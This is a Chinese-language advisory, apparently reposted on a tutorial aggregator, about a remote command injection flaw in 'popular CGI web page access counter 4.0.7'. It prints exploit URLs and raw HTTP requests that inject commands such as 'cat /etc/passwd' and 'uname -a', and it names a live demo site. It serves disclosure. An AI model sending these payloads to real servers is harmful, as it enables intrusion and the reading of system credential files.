popularCGIwebpageaccesscounter4.0.7允许远程执行任

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了popularCGIwebpageaccesscounter4.0.7允许远程执行任，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1335字，纯文字阅读大概需要2分钟。

内容图文

涉及程序： popular CGI web page access counter 4.0.7 描述： popular CGI web page access counter 4.0.7 允许 远程 执行 任意命令 详细： popular CGI web page access counter 4.0.7 版由于不检查用户输入,导致 允许 用户 执行 任意命令， 。用户所拥有

涉及程序：
popular CGI web page access counter 4.0.7

描述：
popular CGI web page access counter 4.0.7允许远程执行任意命令

详细：
popular CGI web page access counter 4.0.7 版由于不检查用户输入,导致允许用户执行任意命令，
。用户所拥有的执行这些命令的权限和WEB SERVER是一样的.使用其它的Exploits可以得到未打补丁的`系统的root权限。

这个计数器包含用perl script写成的"counter"，和与"counter"多重连接的counter-old,counterfiglet,counterfiglet-ord, counterbanner, 和 counterbanner-ord.
以下例子说明此漏洞如何可以被利用.


使用如下URL
------------------
http://www.xxx.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id


Passing commands in a variable
------------------------------
> telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd


> telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV"); HTTP/1.0
X: echo;id;uname -a;w

国外示范站点
http://seal.gatech.edu/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;ls


解决方案：
使用其它计数器。

内容总结

以上是互联网集市为您收集整理的popularCGIwebpageaccesscounter4.0.7允许远程执行任全部内容，希望文章能够帮你解决popularCGIwebpageaccesscounter4.0.7允许远程执行任所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

---